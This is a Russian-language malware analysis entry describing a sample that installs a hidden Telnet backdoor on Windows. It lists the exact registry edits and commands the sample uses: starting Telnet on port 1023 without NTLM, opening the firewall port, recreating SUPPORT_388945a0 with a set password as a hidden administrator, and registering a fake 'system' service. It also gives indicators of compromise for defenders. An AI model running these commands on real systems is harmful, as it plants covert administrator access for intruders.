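Техническая информация
Ниже перечислены изменения реестра, запускаемые процессы и затрагиваемые файлы (подзаголовки разделов в этом фрагменте, по-видимому, не сохранились). По совокупности команд образец включает автозапуск службы Telnet (TlntSvr, а также дополнительная служба с именем «system», использующая тот же исполняемый файл tlntsvr.exe), настраивает её на порт TCP 1023 с отключённой NTLM-аутентификацией и открывает этот порт в брандмауэре Windows. Учётная запись SUPPORT_388945a0 удаляется и создаётся заново с заданным паролем, переносится из группы «Пользователи» в группу «Администраторы» и скрывается с экрана приветствия через значение в SpecialAccounts\UserList. Имя SUPPORT_388945a0 совпадает со стандартной служебной учётной записью Windows XP/Server 2003, поэтому признаком компрометации служит не само её наличие, а членство в группе администраторов, нулевое значение в UserList и служба Telnet, слушающая порт 1023.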
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\system] 'Start' = '00000002'
- <Текущая директория>\12.exe
- <SYSTEM32>\net1.exe start telnet
- <SYSTEM32>\tlntadmn.exe config port=1023 sec=-NTLM
- <SYSTEM32>\reg.exe add HKLM\SYSTEM\ControlSet001\Services\TlntSvr /f /v Start /t REG_DWORD /d 2
- <SYSTEM32>\net1.exe start system
- <SYSTEM32>\netsh.exe firewall add portopening TCP 1023 telnet
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\sc.exe create system binpath= <SYSTEM32>\tlntsvr.exe type= own start= auto
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 /delete
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\mcdfndj.bat" "
- <SYSTEM32>\net1.exe user SUPPORT_388945a0 12123 /add
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v SUPPORT_388945a0 /t REG_DWORD /d 0
- <SYSTEM32>\net1.exe localgroup Пользователи SUPPORT_388945a0 /delete
- <SYSTEM32>\net1.exe localgroup Администраторы SUPPORT_388945a0 /add
- <Текущая директория>\12.exe
- %TEMP%\1.tmp\mcdfndj.bat
- %TEMP%\1.tmp\mcdfndj.bat
- <Текущая директория>\12.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''